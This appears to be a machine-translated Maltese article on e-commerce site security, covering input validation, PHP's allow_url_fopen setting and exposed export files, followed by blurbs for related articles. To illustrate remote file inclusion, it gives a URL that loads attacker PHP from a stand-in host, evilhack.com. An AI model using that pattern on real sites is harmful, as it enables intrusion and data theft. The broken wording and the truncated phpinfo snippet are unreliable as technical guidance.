Sigurtà fl-e-commerce websajt jeħtieġ li jkun kunsiderazzjoni ewlenija meta jiżviluppaw e-websajt kummerċ jew softwer. A iżviluppatur jeħtieġ li jkun konxju tal-kunsiderazzjonijiet kollha ta 'sigurtà meta titfassal sit. Bil-kummerċ elettroniku issir aktar komuni f'dawn il-jiem, l-għadd ta 'attakki ta' sigurtà hija ċertament tiżdied. Paranojja hija ħaġa b'saħħithom għall-e-commerce-iżviluppaturi sit, għandna bżonn li jżommu sa gate ma 'kwistjonijiet ta' sigurtà , u żżomm widnejn tagħna u l-għajnejn miftuħa. Għalkemm l-lakuni li ġejjin huma serji, il-lakuni li ġejjin jekk preżenti huma faċilment fissi.
Elenkati hawn taħt huma xi konsiderazzjonijiet ta 'sigurtà li għandhom jiġu inklużi meta jkunu qed jiżviluppaw sit. Dan l-artikolu ma jkoprix e-shoplifting, jekk jogħġbok ara l-artikolu separat tiegħi dwar dan.
Input Utent - kull kontribut, kemm jekk ikun jidħlu kwantità , it-tiftix għal xi prodott, li jidħlu isem eċċ, jeħtieġ li jiġi vvalidat għall-karattri suspettużi. Jekk dan ma jsirx, huwa possibbli li jidħlu "?>", tags tmiem l-għeluq tal-PHP u jesegwixxi xi kodiċi PHP.
Huwa ħafna aktar sikur jippermettu n-numri u l-karattri az (kapitali inklużi) u 0-9 u xejn iktar, milli jagħmlu lista ta 'l-karattru li m'għandux ikun hemm. L-iskript validazzjoni jeħtieġ li tiskrollja minn kull karattru wieħed wieħed. Dan jeħtieġ li jintlaħaq bl-użu fil-validazzjoni server sekondarji, mhux Javascript. Bl-użu server naħa l-input ta 'validazzjoni hija essenzjali biex iżommu l-karattri mixtieqa
Teżisti ieħor maġġuri meta jesegwixxi kodiċi PHP. Meta jintużaw PHP hemm iffissar msejħa allow_url_fopen li jippermetti l-ftuħ ta 'fajls minn b'kitba PHP. Dan l-iffissar għandu ikun mitfi, sakemm ma jkunx assolutament meħtieġ.
Immaġina inti għandek skripts PHP kemm għall headers fissi u footers, u għall-aċċess webpages tiegħek inti tip http://www.mysite.com/index.php?page=page2. Kollha hija tieħu huwa utent malizzjużi jiddekorri b'kitba billi timmodifika dawn il-parametri billi jittajpja fil-"http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" ma xi kodiċi PHP fil-fajl "hacker.txt". Jista 'jkollok xi ħaġa jiġri, PHP-fajls jinqraw, mħassra, informazzjoni vitali misruqa.
Jekk m'intix ċert jekk dan l-istabbiliment ikun fuq jew barra, jekk jogħġbok kopja PHP l-kodiċi li ġejjin fil-fajl test, u upload li web server tiegħek:
phpinfo ();
?>
Meta inti aċċess iskrittura tiegħek dwar webserver tiegħek, inti għandek jiltaqgħu ma l-iffissar allow_url_fopen taħt konfigurazzjoni.
A utent tal-kompjuter, taħt ċirkostanzi normali ma tistax issib il-valur ta 'dan l-iffissar.
Oqgħod attent ta 'data esportati bħal ordnijiet, il-prodotti fil-CSV u fajls mySQL. Jekk din id-dejta huwa esportat mill-iskrittura u tinżamm fuq il-web server, jiġifieri taħt isem komuni fajl. http://www.mysite.com/admin/output_tables.csv. Dan huwa biss verament problema meta l-informazzjoni esportati tirrisjedi fi fajl ta 'direttorju li huwa aċċessibbli għall-pubbliku. Hemm żewġ modi kif jiġi evitat dan il-lakuna ta 'sigurtà - L-ewwel ikollhom l-fajl output wara password protett direttorju, it-tieni jkollhom id-data ikunu jinstabu ġewwa l-element HTML forma textarea fuq skript. Il-storeowner jista 'mbagħad kopja ta din l-informazzjoni mill-textfile u toħloq fajl ġdid fuq il-kompjuter tagħhom u paste tal-informazzjoni hawn.
Kollha hija tieħu huwa Hacker biex isibu din filename billi tiċċekkja l-e-commerce software tal-demo-websajt u jfittxu l-istess isem tal-file fuq sit reali.
Elenkati hawn taħt huma aktar artikli relatati mal-artikolu hawn fuq mill-kategorija ECommerce "oġġett".
Persuni interessati fl-artikolu hawn fuq "E-Commerce-Sigurtà - Tneħħija l-toqob Sigurtà " huma wkoll interessati fl-artikoli relatati mniżżla hawn taħt:
Running-e tan-negozju commerce mhuwiex biss dwar żamma website tiegħek u titħaddem. Klijenti jiddependu fuq il-ħila tiegħek li jservu lilhom permezz tat-telefon, faks, email, jew mezzi oħra, u jirrikjedi li dawk kollha ta 'sistemi tiegħek li tkun tax-xogħol biex ikunu jistgħu jissodisfaw it-talbiet tal-klijenti.
Biss ftit jiem wara kien lura I f'chat mal-ħabib tiegħi. Huwa kien ċelebrazzjoni tiegħu baby's birthday 1 u kellu jiddekorri bejn l-indiġeni tiegħu fil Kerala u Chennai, il-post tax-xogħol tiegħu. Huwa u nofs aħjar tiegħu traveled bejn dawn il-postijiet l-anqas 4 darbiet fl-aħħar xahar.
Jekk int qed tagħmel il-kummerċ elettroniku għal kwalunkwe ammont ta 'ħin, inti tkun taf li hemm scamers aktar minn fornituri ġenwini ta' servizzi bl-ingrossa direttorju dropship. Fid-dinja ta 'l-e-business, Salehoo u Brands Madwar id-dinja huma kemm il-fornituri tas-servizz ta' fama li kisbu popolarità fl-aħħar snin.
Jekk qatt kellek xi bejjiegħ bl-imnut online, inti probabilment diġà smajt dwar Salehoo jew saħansitra użati biex vantaġġ tiegħek. Jekk inti kemm bdew man-negozju tiegħek, inti tista 'tiġi mħawda mad-Salehoo imħallat reviżjonijiet hemmhekk. Issa, ejjew tagħti ħarsa lejn dak li hu verament Salehoo kollha dwar u s-servizzi li huma joffru għandhom it-tendenza li ħafna ma jarawx.
Kif ħafna nies taf li xtraw online xi ħaġa? Jekk tiegħek simili me pjuttost ftit, li l-eCommerce għaliex huwa fid-dinja mall ġodda shopping online. Imma li tmexxi dawn il-ħwienet bl-imnut fuq l-internet? Nies bħad inti u jien, hu għalhekk li dan in-negozju jkun qed jisplodu u se tkompli boom issa u sew fil-futur.
Jekk inti fan enormi tal-prodotti elettroniċi aħħar, inti jista 'jitħajjar mill-idea ta' tmexxija onlajn your own business elettronika. Mhuwiex diffiċli li tibda meta tieħu l-vantaġġ sħiħ tal-waqgħa dritt tbaħħir servizz elettronika u hemm ħafna għalik li jagħżlu minn.
Ridt qatt tmur fil-maħżen konvenjenza tiegħek lokali u wonder dak li kien ikun simili jekk inti proprjetà it? Kieku inti tkun sid tajba, ser-nies bħalek? Well dan l-artikolu ser nuruk l-benefiċċji ta 'l-proprjetarja taħżen tiegħek online bl-imnut, jew magħrufa komunement bħala e-commerce li hija differenti minn xi maħżen tal-konvenjenza reali lokali.
